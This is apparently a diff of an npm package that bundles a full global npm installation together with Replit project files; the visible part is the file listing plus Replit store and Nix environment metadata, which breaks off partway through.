  2031. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/index.js +20 -0
  2032. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/length.d.ts +4 -0
  2033. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/length.js +63 -0
  2034. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/obj.d.ts +15 -0
  2035. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/obj.js +152 -0
  2036. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/parse.d.ts +7 -0
  2037. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/parse.js +125 -0
  2038. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/tag.d.ts +28 -0
  2039. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/tag.js +86 -0
  2040. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/crypto.d.ts +10 -0
  2041. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/crypto.js +64 -0
  2042. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/dsse.d.ts +2 -0
  2043. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/dsse.js +25 -0
  2044. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/encoding.d.ts +6 -0
  2045. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/encoding.js +46 -0
  2046. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/index.d.ts +9 -0
  2047. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/index.js +50 -0
  2048. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/json.d.ts +1 -0
  2049. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/json.js +61 -0
  2050. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/oidc.d.ts +1 -0
  2051. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/oidc.js +54 -0
  2052. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/pem.d.ts +3 -0
  2053. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/pem.js +44 -0
  2054. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/promise.d.ts +1 -0
  2055. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/promise.js +27 -0
  2056. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/stream.d.ts +24 -0
  2057. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/stream.js +116 -0
  2058. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/ua.d.ts +1 -0
  2059. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/ua.js +33 -0
  2060. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/verify.d.ts +13 -0
  2061. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/verify.js +144 -0
  2062. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/x509/cert.d.ts +48 -0
  2063. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/x509/cert.js +242 -0
  2064. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/x509/ext.d.ts +42 -0
  2065. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/x509/ext.js +145 -0
  2066. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/x509/sct.d.ts +26 -0
  2067. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/x509/sct.js +101 -0
  2068. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/x509/verify.d.ts +8 -0
  2069. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/x509/verify.js +177 -0
  2070. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/package.json +46 -0
  2071. package/.config/npm/node_global/lib/node_modules/npm/node_modules/smart-buffer/LICENSE +20 -0
  2072. package/.config/npm/node_global/lib/node_modules/npm/node_modules/smart-buffer/build/smartbuffer.js +1233 -0
  2073. package/.config/npm/node_global/lib/node_modules/npm/node_modules/smart-buffer/build/utils.js +108 -0
  2074. package/.config/npm/node_global/lib/node_modules/npm/node_modules/smart-buffer/docs/ROADMAP.md +0 -0
  2075. package/.config/npm/node_global/lib/node_modules/npm/node_modules/smart-buffer/package.json +79 -0
  2076. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/LICENSE +20 -0
  2077. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/build/client/socksclient.js +793 -0
  2078. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/build/common/constants.js +114 -0
  2079. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/build/common/helpers.js +128 -0
  2080. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/build/common/receivebuffer.js +43 -0
  2081. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/build/common/util.js +25 -0
  2082. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/build/index.js +18 -0
  2083. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/docs/examples/index.md +17 -0
  2084. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/docs/examples/javascript/associateExample.md +90 -0
  2085. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/docs/examples/javascript/bindExample.md +83 -0
  2086. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/docs/examples/javascript/connectExample.md +258 -0
  2087. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/docs/examples/typescript/associateExample.md +93 -0
  2088. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/docs/examples/typescript/bindExample.md +86 -0
  2089. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/docs/examples/typescript/connectExample.md +265 -0
  2090. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/docs/index.md +5 -0
  2091. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/docs/migratingFromV1.md +86 -0
  2092. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks/package.json +58 -0
  2093. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks-proxy-agent/dist/index.js +197 -0
  2094. package/.config/npm/node_global/lib/node_modules/npm/node_modules/socks-proxy-agent/package.json +181 -0
  2095. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-correct/LICENSE +202 -0
  2096. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-correct/index.js +386 -0
  2097. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-correct/package.json +32 -0
  2098. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-exceptions/index.json +40 -0
  2099. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-exceptions/package.json +17 -0
  2100. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-expression-parse/AUTHORS +4 -0
  2101. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-expression-parse/LICENSE +22 -0
  2102. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-expression-parse/index.js +8 -0
  2103. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-expression-parse/package.json +39 -0
  2104. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-expression-parse/parse.js +138 -0
  2105. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-expression-parse/scan.js +131 -0
  2106. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-license-ids/deprecated.json +27 -0
  2107. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-license-ids/index.json +507 -0
  2108. package/.config/npm/node_global/lib/node_modules/npm/node_modules/spdx-license-ids/package.json +39 -0
  2109. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ssri/LICENSE.md +16 -0
  2110. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ssri/lib/index.js +580 -0
  2111. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ssri/package.json +65 -0
  2112. package/.config/npm/node_global/lib/node_modules/npm/node_modules/string-width/index.js +47 -0
  2113. package/.config/npm/node_global/lib/node_modules/npm/node_modules/string-width/license +9 -0
  2114. package/.config/npm/node_global/lib/node_modules/npm/node_modules/string-width/package.json +56 -0
  2115. package/.config/npm/node_global/lib/node_modules/npm/node_modules/string-width-cjs/index.js +47 -0
  2116. package/.config/npm/node_global/lib/node_modules/npm/node_modules/string-width-cjs/license +9 -0
  2117. package/.config/npm/node_global/lib/node_modules/npm/node_modules/string-width-cjs/package.json +56 -0
  2118. package/.config/npm/node_global/lib/node_modules/npm/node_modules/string_decoder/LICENSE +48 -0
  2119. package/.config/npm/node_global/lib/node_modules/npm/node_modules/string_decoder/lib/string_decoder.js +296 -0
  2120. package/.config/npm/node_global/lib/node_modules/npm/node_modules/string_decoder/package.json +34 -0
  2121. package/.config/npm/node_global/lib/node_modules/npm/node_modules/strip-ansi/index.js +4 -0
  2122. package/.config/npm/node_global/lib/node_modules/npm/node_modules/strip-ansi/license +9 -0
  2123. package/.config/npm/node_global/lib/node_modules/npm/node_modules/strip-ansi/package.json +54 -0
  2124. package/.config/npm/node_global/lib/node_modules/npm/node_modules/strip-ansi-cjs/index.js +4 -0
  2125. package/.config/npm/node_global/lib/node_modules/npm/node_modules/strip-ansi-cjs/license +9 -0
  2126. package/.config/npm/node_global/lib/node_modules/npm/node_modules/strip-ansi-cjs/package.json +54 -0
  2127. package/.config/npm/node_global/lib/node_modules/npm/node_modules/supports-color/browser.js +30 -0
  2128. package/.config/npm/node_global/lib/node_modules/npm/node_modules/supports-color/index.js +182 -0
  2129. package/.config/npm/node_global/lib/node_modules/npm/node_modules/supports-color/license +9 -0
  2130. package/.config/npm/node_global/lib/node_modules/npm/node_modules/supports-color/package.json +61 -0
  2131. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/LICENSE +15 -0
  2132. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/index.js +18 -0
  2133. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/create.js +111 -0
  2134. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/extract.js +113 -0
  2135. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/get-write-flag.js +20 -0
  2136. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/header.js +304 -0
  2137. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/high-level-opt.js +29 -0
  2138. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/large-numbers.js +104 -0
  2139. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/list.js +139 -0
  2140. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/mkdir.js +229 -0
  2141. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/mode-fix.js +27 -0
  2142. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/normalize-unicode.js +12 -0
  2143. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/normalize-windows-path.js +8 -0
  2144. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/pack.js +420 -0
  2145. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/parse.js +509 -0
  2146. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/path-reservations.js +156 -0
  2147. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/pax.js +150 -0
  2148. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/read-entry.js +107 -0
  2149. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/replace.js +246 -0
  2150. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/strip-absolute-path.js +24 -0
  2151. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/strip-trailing-slashes.js +13 -0
  2152. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/types.js +44 -0
  2153. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/unpack.js +906 -0
  2154. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/update.js +40 -0
  2155. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/warn-mixin.js +24 -0
  2156. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/winchars.js +23 -0
  2157. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/lib/write-entry.js +546 -0
  2158. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/node_modules/fs-minipass/LICENSE +15 -0
  2159. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/node_modules/fs-minipass/index.js +422 -0
  2160. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/node_modules/fs-minipass/node_modules/minipass/LICENSE +15 -0
  2161. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/node_modules/fs-minipass/node_modules/minipass/index.js +649 -0
  2162. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/node_modules/fs-minipass/node_modules/minipass/package.json +56 -0
  2163. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/node_modules/fs-minipass/package.json +39 -0
  2164. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tar/package.json +75 -0
  2165. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/LICENSE +18 -0
  2166. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/example/align.js +8 -0
  2167. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/example/center.js +8 -0
  2168. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/example/dotalign.js +9 -0
  2169. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/example/doubledot.js +11 -0
  2170. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/example/table.js +6 -0
  2171. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/index.js +86 -0
  2172. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/package.json +44 -0
  2173. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/test/align.js +18 -0
  2174. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/test/ansi-colors.js +32 -0
  2175. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/test/center.js +18 -0
  2176. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/test/dotalign.js +20 -0
  2177. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/test/doubledot.js +24 -0
  2178. package/.config/npm/node_global/lib/node_modules/npm/node_modules/text-table/test/table.js +14 -0
  2179. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/LICENSE.md +21 -0
  2180. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/lib/factory.js +100 -0
  2181. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/lib/index.js +18 -0
  2182. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/package.json +39 -0
  2183. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/src/factory.js +89 -0
  2184. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/src/index.js +4 -0
  2185. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/translations/da.js +31 -0
  2186. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/translations/de.js +31 -0
  2187. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/translations/en-short.js +31 -0
  2188. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/translations/en.js +31 -0
  2189. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tiny-relative-date/translations/es.js +31 -0
  2190. package/.config/npm/node_global/lib/node_modules/npm/node_modules/treeverse/LICENSE +15 -0
  2191. package/.config/npm/node_global/lib/node_modules/npm/node_modules/treeverse/lib/breadth.js +67 -0
  2192. package/.config/npm/node_global/lib/node_modules/npm/node_modules/treeverse/lib/depth-descent.js +88 -0
  2193. package/.config/npm/node_global/lib/node_modules/npm/node_modules/treeverse/lib/depth.js +76 -0
  2194. package/.config/npm/node_global/lib/node_modules/npm/node_modules/treeverse/lib/index.js +4 -0
  2195. package/.config/npm/node_global/lib/node_modules/npm/node_modules/treeverse/package.json +51 -0
  2196. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/LICENSE +21 -0
  2197. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/dist/config.js +14 -0
  2198. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/dist/error.js +48 -0
  2199. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/dist/fetcher.js +84 -0
  2200. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/dist/index.js +9 -0
  2201. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/dist/store.js +208 -0
  2202. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/dist/updater.js +320 -0
  2203. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/dist/utils/tmpfile.js +25 -0
  2204. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/dist/utils/url.js +14 -0
  2205. package/.config/npm/node_global/lib/node_modules/npm/node_modules/tuf-js/package.json +46 -0
  2206. package/.config/npm/node_global/lib/node_modules/npm/node_modules/unique-filename/LICENSE +5 -0
  2207. package/.config/npm/node_global/lib/node_modules/npm/node_modules/unique-filename/lib/index.js +7 -0
  2208. package/.config/npm/node_global/lib/node_modules/npm/node_modules/unique-filename/package.json +51 -0
  2209. package/.config/npm/node_global/lib/node_modules/npm/node_modules/unique-slug/LICENSE +15 -0
  2210. package/.config/npm/node_global/lib/node_modules/npm/node_modules/unique-slug/lib/index.js +11 -0
  2211. package/.config/npm/node_global/lib/node_modules/npm/node_modules/unique-slug/package.json +47 -0
  2212. package/.config/npm/node_global/lib/node_modules/npm/node_modules/util-deprecate/History.md +16 -0
  2213. package/.config/npm/node_global/lib/node_modules/npm/node_modules/util-deprecate/LICENSE +24 -0
  2214. package/.config/npm/node_global/lib/node_modules/npm/node_modules/util-deprecate/browser.js +67 -0
  2215. package/.config/npm/node_global/lib/node_modules/npm/node_modules/util-deprecate/node.js +6 -0
  2216. package/.config/npm/node_global/lib/node_modules/npm/node_modules/util-deprecate/package.json +27 -0
  2217. package/.config/npm/node_global/lib/node_modules/npm/node_modules/validate-npm-package-license/LICENSE +202 -0
  2218. package/.config/npm/node_global/lib/node_modules/npm/node_modules/validate-npm-package-license/index.js +86 -0
  2219. package/.config/npm/node_global/lib/node_modules/npm/node_modules/validate-npm-package-license/package.json +28 -0
  2220. package/.config/npm/node_global/lib/node_modules/npm/node_modules/validate-npm-package-name/LICENSE +6 -0
  2221. package/.config/npm/node_global/lib/node_modules/npm/node_modules/validate-npm-package-name/lib/index.js +107 -0
  2222. package/.config/npm/node_global/lib/node_modules/npm/node_modules/validate-npm-package-name/package.json +65 -0
  2223. package/.config/npm/node_global/lib/node_modules/npm/node_modules/walk-up-path/LICENSE +15 -0
  2224. package/.config/npm/node_global/lib/node_modules/npm/node_modules/walk-up-path/dist/cjs/index.js +18 -0
  2225. package/.config/npm/node_global/lib/node_modules/npm/node_modules/walk-up-path/dist/cjs/package.json +3 -0
  2226. package/.config/npm/node_global/lib/node_modules/npm/node_modules/walk-up-path/dist/mjs/index.js +14 -0
  2227. package/.config/npm/node_global/lib/node_modules/npm/node_modules/walk-up-path/dist/mjs/package.json +3 -0
  2228. package/.config/npm/node_global/lib/node_modules/npm/node_modules/walk-up-path/package.json +72 -0
  2229. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wcwidth/LICENSE +30 -0
  2230. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wcwidth/combining.js +50 -0
  2231. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wcwidth/docs/index.md +65 -0
  2232. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wcwidth/index.js +99 -0
  2233. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wcwidth/package.json +42 -0
  2234. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wcwidth/test/index.js +64 -0
  2235. package/.config/npm/node_global/lib/node_modules/npm/node_modules/which/LICENSE +15 -0
  2236. package/.config/npm/node_global/lib/node_modules/npm/node_modules/which/README.md +51 -0
  2237. package/.config/npm/node_global/lib/node_modules/npm/node_modules/which/bin/which.js +52 -0
  2238. package/.config/npm/node_global/lib/node_modules/npm/node_modules/which/lib/index.js +115 -0
  2239. package/.config/npm/node_global/lib/node_modules/npm/node_modules/which/package.json +51 -0
  2240. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wide-align/LICENSE +14 -0
  2241. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wide-align/align.js +65 -0
  2242. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wide-align/package.json +33 -0
  2243. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/index.js +214 -0
  2244. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/license +9 -0
  2245. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/ansi-regex/index.js +8 -0
  2246. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/ansi-regex/license +9 -0
  2247. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/ansi-regex/package.json +58 -0
  2248. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/ansi-styles/index.js +223 -0
  2249. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/ansi-styles/license +9 -0
  2250. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/ansi-styles/package.json +54 -0
  2251. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/emoji-regex/LICENSE-MIT.txt +20 -0
  2252. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/emoji-regex/RGI_Emoji.js +6 -0
  2253. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/emoji-regex/es2015/RGI_Emoji.js +6 -0
  2254. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/emoji-regex/es2015/index.js +6 -0
  2255. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/emoji-regex/es2015/text.js +6 -0
  2256. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/emoji-regex/index.js +6 -0
  2257. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/emoji-regex/package.json +52 -0
  2258. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/emoji-regex/text.js +6 -0
  2259. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/string-width/index.js +54 -0
  2260. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/string-width/license +9 -0
  2261. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/string-width/package.json +59 -0
  2262. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/strip-ansi/index.js +14 -0
  2263. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/strip-ansi/license +9 -0
  2264. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/node_modules/strip-ansi/package.json +57 -0
  2265. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi/package.json +69 -0
  2266. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi-cjs/index.js +216 -0
  2267. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi-cjs/license +9 -0
  2268. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrap-ansi-cjs/package.json +62 -0
  2269. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrappy/LICENSE +15 -0
  2270. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrappy/package.json +29 -0
  2271. package/.config/npm/node_global/lib/node_modules/npm/node_modules/wrappy/wrappy.js +33 -0
  2272. package/.config/npm/node_global/lib/node_modules/npm/node_modules/write-file-atomic/LICENSE.md +6 -0
  2273. package/.config/npm/node_global/lib/node_modules/npm/node_modules/write-file-atomic/lib/index.js +267 -0
  2274. package/.config/npm/node_global/lib/node_modules/npm/node_modules/write-file-atomic/package.json +57 -0
  2275. package/.config/npm/node_global/lib/node_modules/npm/node_modules/yallist/LICENSE +15 -0
  2276. package/.config/npm/node_global/lib/node_modules/npm/node_modules/yallist/iterator.js +8 -0
  2277. package/.config/npm/node_global/lib/node_modules/npm/node_modules/yallist/package.json +29 -0
  2278. package/.config/npm/node_global/lib/node_modules/npm/node_modules/yallist/yallist.js +426 -0
  2279. package/.config/npm/node_global/lib/node_modules/npm/package.json +257 -0
  2280. package/.replit +89 -0
  2281. package/.upm/store.json +1 -0
  2282. package/index.js +13 -0
  2283. package/package.json +15 -0
  2284. package/replit.nix +8 -0
@@ -0,0 +1 @@
1
+ {"nonce":6979913439821300474,"last_updated":{"seconds":1689540731,"nanos":145125000}}
@@ -0,0 +1 @@
1
+ 2jmj7l5rSw0yVb_vlWAYkK_YBwk=
@@ -0,0 +1 @@
1
+ {"entries":{"replit.nix":{"env":{"AR":"ar","AS":"as","CC":"gcc","CONFIG_SHELL":"/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin/bash","CXX":"g++","HOST_PATH":"/nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/bin:/nix/store/7rfpsb04f2r6a755bqmmj1i90x8p1b18-typescript-language-server-3.1.0/bin:/nix/store/zdcnqq55qi214j46zgw2qa1jp4dpdf2m-yarn-1.22.19/bin:/nix/store/hqc964yg79161afx85fvcmg1a6879k5i-jest-cli-23.6.0/bin:/nix/store/a7gvj343m05j2s32xcnwr35v31ynlypr-coreutils-9.1/bin:/nix/store/mydc6f4k2z73xlcz7ilif3v2lcaiqvza-findutils-4.9.0/bin:/nix/store/j9p3g8472iijd50vhdprx0nmk2fqn5gv-diffutils-3.8/bin:/nix/store/89zs7rms6x00xfq4dq6m7mjnhkr8a6r4-gnused-4.8/bin:/nix/store/86bp03jkmsl6f92w0yzg4s59g5mhxwmy-gnugrep-3.7/bin:/nix/store/hwcdqw4jrjnd37wxqgsd47hd0j8bnj09-gawk-5.1.1/bin:/nix/store/cfbhw8r8ags41vwqaz47r583d0p4h4a1-gnutar-1.34/bin:/nix/store/p3m1ndl1lapwrlh698bnb5lvvxh67378-gzip-1.12/bin:/nix/store/a8mhcagrsly7c7mpjrpsnaahk4aax056-bzip2-1.0.8-bin/bin:/nix/store/mblgz65m3zv9x548a3d5m96fj2pbwr09-gnumake-4.3/bin:/nix/store/dsd5gz46hdbdk2rfdimqddhq6m8m8fqs-bash-5.1-p16/bin:/nix/store/v7ljksji50mg3w61dykaa3n3y79n6nil-patch-2.7.6/bin:/nix/store/zlcnmqq14jz5x9439jf937mvayyl63da-xz-5.2.7-bin/bin:/nix/store/y6aj732zm9m87c82fpvf103a1xb22blp-file-5.43/bin","LD":"ld","LOCALE_ARCHIVE":"/usr/lib/locale/locale-archive","NIX_BINTOOLS":"/nix/store/1d6ian3r8kdzspw8hacjhl3xkp40g1lj-binutils-wrapper-2.39","NIX_BINTOOLS_WRAPPER_TARGET_HOST_x86_64_unknown_linux_gnu":"1","NIX_BUILD_CORES":"16","NIX_BUILD_TOP":"/tmp","NIX_CC":"/nix/store/dq0xwmsk1g0i2ayg6pb7y87na2knzylh-gcc-wrapper-11.3.0","NIX_CC_WRAPPER_TARGET_HOST_x86_64_unknown_linux_gnu":"1","NIX_CFLAGS_COMPILE":" -frandom-seed=7ya8xlq922 -isystem /nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/include -isystem /nix/store/dj805sw07vvpbxx39c8g67x8qddg0ikw-nodejs-18.12.1/include","NIX_ENFORCE_NO_NATIVE":"1","NIX_HARDENING_ENABLE":"fortify stackprotector pic strictoverflow format relro bindnow","NIX_INDENT_MAKE":"1","NIX_LDFLAGS":"-rpath /nix/store/7ya8xlq922h1fx115xra9kl0d0pfk2ab-nix-shell/lib64 -rpath /nix/store/7ya8xlq922h1fx115xra9kl0d0pfk2ab-nix-shell/lib 